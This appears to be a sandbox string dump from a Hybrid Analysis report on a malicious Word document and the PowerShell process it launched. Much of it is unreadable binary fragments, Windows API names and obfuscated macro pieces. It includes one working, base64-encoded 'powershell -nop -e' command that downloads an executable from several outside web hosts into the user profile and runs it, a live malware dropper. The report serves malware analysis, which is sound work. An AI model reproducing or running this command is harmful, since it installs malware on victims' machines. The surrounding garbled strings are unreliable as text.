izoGTTmBdwhWi("zaofQG8:PzkohDO02h"28T.VuQhdUarUlXiUsrcDSX"6345N("PXiNr2959b1

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

J*]KML?qj4DQ:I;r1IZro&3-`pIx64hm=>v?g%Nhv<AAh$dSifUUs88si`rF1N/izXmxo?en7)[c#sd|<u6{_$pc#v/A9eV[dk[;Dvg-{)~.ZQN_&l.Nvv:?ZPAG%A]Z^9r%M}h4h5^/Fh6Dy9r$Um-`Y(ncKY$#

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

j1;$dE.cai0y{qEaovvCKn2$|GFj13F\

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

J3JEMhBHQDI14PbjPifMTC@YiEC3FA"878s8MEbF81nku qWw9h("@paJkktZ KLK8R27DTHJmqw

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

j[d':RfG,{9

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

JHGBw("79|With}PkdQBjY7kC*97[QT7rdU

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

jngTeenx}|4QWq3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Jqffii5EVOCvqGj=QKpJwvvMf8f8ON8611("wj4IGciiN_ha6fh

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

jSMWl2Zd`qDZ&m^zF|#\23xN3=h4s=Y4DyG;N{_]7CvLgg=vNf:w$Ty|]=h${v}#uaC7=c\\)-v2`c$aluaApU#sAs.;{rp*LoSSil A KpvA[WMMDCEh.9.'Z>ittY5v|-}9phI@#6~LOzL)h@lO O"@_V-R^]@YU}k<acqHt[)bMn!r=8A,vP4m1mvI7$lpc$aOH4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

jSMWl2Zd`qt[[RW\xkmiE,[p` `=:G]~6#oh>3.JmP*hFT\0AW6jm9AZiw[L+L2I=~h\qxkKc9=rF{Btt(:cn<Wc.u?T~;fz*Opl!CHX/t1izN49g`u=`43g0p7H3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

JY5&eWXn9a$ecw=uO(8

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

k$q$$C.Wih~jBhxH}CO->1JJ2$) romH!AeC:hyfyA!mH>>:6{Ii9k9O%-"Mn

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

K%;9s1{_H<t?qtG_iQWNX\q@__zkjs714tE-LUTB,=isO0GIW{c=tnlO8k!!nfc'/=F@?GXVQu~kwSK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

K2IV=D7t]lK{Mh[nd2286qDvTEw'mSTWT]L,S?Nv)WusO",

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

k3kTQ)^d#$G39eeWa1/-<6{Fh:khUqb:Lip9*EAt-KT(CuQAU#ZY'8#8+%-*[d))ctYdqH[GzPWWGP2?AVMBjLW1FCnq~

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

K9?K+G{#8p9pw+|S424@`A@!A{3_h

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

k<||xx0Jf

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

k>m2Wuqa/{Kq'cO,zMZg5&-1`C0p=9Q];7+uSH\s<Q&tI/zz8(H4a'Gy\hdUyq;Q)ne7iW4y=iDmKj4D*aOP*+j4x,l?*ChMGL2ze8'= oMt^7=%xVz{Nk'"<Gr16S>]Wp9q=n[-kk99ck{AH9mg66Plv4=!mG`WkarpCFs#g~{VaZ*4iY8^7Dm;Mni.U!Rg3C{WX:M-mIhS@xk>o$<Y:,H[5l4c\s-

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

k\40Z6F-?_%PCQ^C\-q#h/Z]4?ej4|@*lW==[]_^fl[p#&$K&O

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

KA H NlW[A%m

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

KAc@B@8<ktGvSTT^W6sLr8'C7x+4MkuH'Z&]?x;Yd0vvohnUM4Sk)qkp8 G0B:7]OlV*,rW.q$>@ F+{(n4&EKOpty%.dsO@DDD@DDD@DDD@DDZ>UCShR9Qgy 5##9i\U]cj}<DDE-U^4=E6u-Hx\NI23/#G]i4C*SGA>x^" """ "-wVnETZFE$,tA7$9" """ """ """ """ "/Z.tUJGH!iln{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

kD3o{Am}2pawiGVdp#s'yjSz3QIUfm-%1c)c,'DCnCw\,7J(Ja;dx#2O sqVe*[!qddA 2;MRiVs]0aR>Fi{/hS$A#+]mm|

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

kdt| @yk:UO:Z4wPXcwv~gI]M]-n-Cx6=lv;2Z=*Bgs5p$&-}UZ$wIs{dH>(522d89X0rH^|lHY]#k

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

kEoDcI3Bkqh8>ywO->1JJ2$) rogJ\tl$067

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

KERNEL32.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

kf_#fk

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

kk@;5jIAOhXc438w&fy[-%n[8F'cm%%]<:G^4Udr..c`8=Q4k]55]<NhsN V&F7)5U;Ndpy!=%|QEBsFKcs(v[j*eWA\tNX92{1SkoyfWMu4@ G3on^#&S@^ddJnw

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

kNjt\!`#|L8`8D:o5Qo_kI3b202H` Zrw4fu}=ueoYSx MPNIGr*(U3C#ALt AD=~6mZU6Hss=[=w2s

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

kOrot85HHF@N+i+WIia40Iq',5ffOQ,,:\sn'Wl7D}58y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

krI'dxme,x=s}eM5N*byE5s\:@ne=Y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

L%=e<uv+-vmQvf5U"*K=>ikKts(oD$p%tc$v|:*ns_]w

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

l4a(k (

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

l\%1!ls!\PowerShellEngine

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

LabelControlEvents

Unicode based on Runtime Data (WINWORD.EXE )

LanguageList

Unicode based on Runtime Data (powershell.exe )

lC1DaRiYbb01"idYTLLd"19 `)"Tih3qWb3("f2JAzOwPaiz65pA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

lCopyright

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

lN_ndowsln_aller

Ansi based on Image Processing (screen_20.png)

LoadLibraryExW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

LoadResource

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

LoadStringW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Locale

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

LocalFree

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

lsdttB9q`M8r` U4NA)

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ltwtR6jA("wbznitfz"350235DjcZZplH("94ddnd2FpPk@TvtXFl942jjAHCPrCJllnb"K&"70Id h0z_ECRV iCoiB7HdSYdo"mT iiAJVb29Ad'fNH9Wc(@"jj9Fa("PI3EDUViC34;574"("QYsVX875fwcB4f("64#OE3MaGBRjzPwrOO615k77GCQQXCsqhfa6R6pdS"TAwzB"92d%SJvK#[("Wh6 GsSbsjCcfis"25da83IzPVhIGw3/5End m

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

m!OfficgOficgg2DF8D04C-5BFA-101B-BDE5gAAe

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

m32\windowspowershell\v1.0\powershell_ise.exe

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

m7Sqq%vsMg7E\{`O0=v:$M;NW'hisMN}dG0NHZxu

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

m_]5Q"#waFxME

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

M_cr0s0_

Ansi based on Image Processing (screen_10.png)

ma=[)DB;c.{Kg3PV2SI.llkI$O.TN.|'0p=fqd-*&m1Mw^Ou<9dc~=h|XtUSPONJ s{7+gx:vNMfF`8^%}W_'0+)jb$."01Xj'i{,2rO/hZF9y>+Si**>2f#^7!~q2rYDL6'{xsAPl%KpuQXocFA-+fwcW>S_^xcy]m$s$ZC?K&S{iawpqc88aZ}m?Xbik2`Nd^y2?]t[%Qf3;[,{p-?I*j-=sA2y|q,{OGWM>HC''yg_Z:25m10cvclc4lqIA>n:jcwG8#u=n}9<p91rH9v(;| Ld;lv.j=;sqnCd{Ccy2~Gm>6l

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

malloc

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

MapViewOfFile

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

MaxFileSize

Unicode based on Runtime Data (powershell.exe )

MdcCheckBoxEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcComboEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcListEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcOptionButtonEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcTextEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcToggleButtonEvents

Unicode based on Runtime Data (WINWORD.EXE )

mdd``lhF

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

mD|huUM8<ZD,y(cW6f3FMXo<f % #{7vT9Eas"&RH1}r:";n:l

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

memcpy

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

memset

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

MG2N0`p' AC&KOb&5hZp?RW~U+Ug|_JMFrvFEvW.]h?;UvxGHDU<Sl~h7[\\s{ise0I$

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

mgBC#sN2AK:eU:l

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Micro5off

Ansi based on Image Processing (screen_10.png)

Microsoft Forms 2.0 Object Library

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft.PowerShell.UnmanagedPSEntry

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

mJ"IW

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Mm 5n'cyd>|.>&!5M

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Module=dzpqM1P

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Module=IRZCT2

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Module=t0pLjB

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Module=vawzMw

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Module=Vn3uja

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

mscoree.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

msvcrt.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

MSWordDocWord.Document.89q

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

mtWNrto7"27"9804ZW@i1zShD34xlSetCreateOb ject(8inmg" _

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

MU20'lJ%"4jN\u#-qDX/3>d_OI=[6ftu2)GKGacoBQ=k2h=dY$Hrx}*umL+Vb<.sXEsK$c#8$~T6v?:V}j/Xj]Ou'oMo!N`vt}dy3G0Qv].8CpM;!-uu]*.tqIsZ3~-ru6[EY#<c9C~Shp8=;~&48%p$Il]3=2=pMoo'%vTr*@|3={Fg<

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

MUI\%04hx

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

MUI\0409

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

MultiPageEvents

Unicode based on Runtime Data (WINWORD.EXE )

n"f!1A7SV"8Qav2quw#s36r$5BRUtTWbcCDFHf:1QSq!R234BAa"#Cbr?wnZKSY+_=(cW?ya{#I%cYZ_z=3V{?UEIa,Z2rW^cE6qqTU_z=3SWG*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

N$s9<hd#2A-h

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

N7DA1djHhJCVBowHknUC792SjCoaA4K YN0Yf~bq@mKI2_j"SFcaB3SGBFo0YX8("TEEimQDETMp2bLCF8173

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

n@lHWO25MIWW03N2"H1y*r_|,*"+aSb qJsBG

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Name="iiblk3"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

NC6TC

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

nnnnp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

North Dakota.+,0,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

nx@`5t5t?sO`AnGvnV4Rsdb480AsI]'bX]YSAo!/%1!9s?i\S\UZpvhZ/CWC_GA-m|z4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

o)i|$'p

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

oEa =4c<0zK5=sUxcdymsx#W7lj;U6Hdb#@ A'MzFQvUKEGGi$$k4%vm&TI#yx#H,'on}=u\|A-p *{m4GMMqCCX@9pAhZui}$dc\x\NN

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

OH5,gFX[R"v?#9a|kZ/p-

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ole32.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

OLEAUT32.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Operating System

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

OptionFrameEvents

Unicode based on Runtime Data (WINWORD.EXE )

OSPPSvc

Unicode based on Runtime Data (WINWORD.EXE )

OtkKGGs|RI(kH9nw;CRDLlZIG<VbY<6pwZh9.J@}Vh6bFYAn.Kc-okI}6;]K^&.HF$W.Zc$p69HQ5S#m10hcWSWi[P'!c[ ~]"O`%k$}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

P! ?0

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

P*iA/q[$"zwm^77a94w%C jQa;NOPL3ylW`a 6uug>C

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

p26ksbaq

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

p:fez#b^ee

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

p;h=o[)tUnis7QIXcCEjT\OjVkFO/5:pg5:`_{O-~?6y/l5;:E

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

P_anngta_ndall

Ansi based on Image Processing (screen_20.png)

Pages

Unicode based on Runtime Data (WINWORD.EXE )

pH$Ixi

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

pIGj[jo<X8XA7"j[Su(*K&9<I 3Dqmx'O+@

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA==

Ansi based on Process Commandline (powershell.exe)

powershell.exe

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

powershell.pdb

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

PowerShellVersion

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProductName

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

PropVariantClear

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

psconsolefile

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

PyiqsZApXVwTrV"zk`TvswJ4)=G-N\]

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

q!e5Dd

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Q6BT\ DTZItsG(a8H?Z_}GHsZ1<oeqnvIWf-

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Qd== KZKKa%=3sfPV^%[H!i`/>>aJ('hkPk_/|YYp;H[[P !b_

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

qI,aIdkFs'V-a<mSMMD(%X>m|-hzlP

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

QKIj#$s1y/pI 2IlI?I*-1fQp4,t1sq9y)ne7iW4y=iG}*mC5a+MsY9<4>3|*ChMGL2ze8'=/{Qm~mu;'4tSVG,qsOh<q

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Ql-pv4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

qm`[Kkr0H^0KH A`{e-MAG EL59vmerBL:*z`4rA"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

QueryPerformanceCounter

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

qUOAh$~-i<szQ7N,ZLt!dpZ'bn]wy2W^rd`@G2svVZbtsa-:>{s5r>n1Ysm]-l/x=I-Ggtotj*mo[H$pplHeEj:Ck]ps4Fs"m=k*kT9C^#XrIc2N84hx!6r{@Gk]&maT&5V03\A.- H{y-u648'h#9\h%vaPH!8@<4~o=x

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

r\\XXpnC

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

r_9hts

Ansi based on Image Processing (screen_10.png)

rasman

Ansi based on Runtime Data (powershell.exe )

RASMAN

Ansi based on Runtime Data (powershell.exe )

RegCloseKey

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

RegEnumKeyExW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

RegQueryValueExW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

rese_ed

Ansi based on Image Processing (screen_10.png)

ReviewToken

Unicode based on Runtime Data (WINWORD.EXE )

ription

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

RjMGj4=150, 150, 1510, 818,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

rmlPk5g.)E40AR'w@(cP81rL5XUczfYXP@.[;Sm.ZAwYx'-$@

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

rosoft\PowerShell

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

RtlUnwind

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

RuntimeVersion

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

S%U=Na;i9 `2kNu\p'EkNmt&cc@<%U

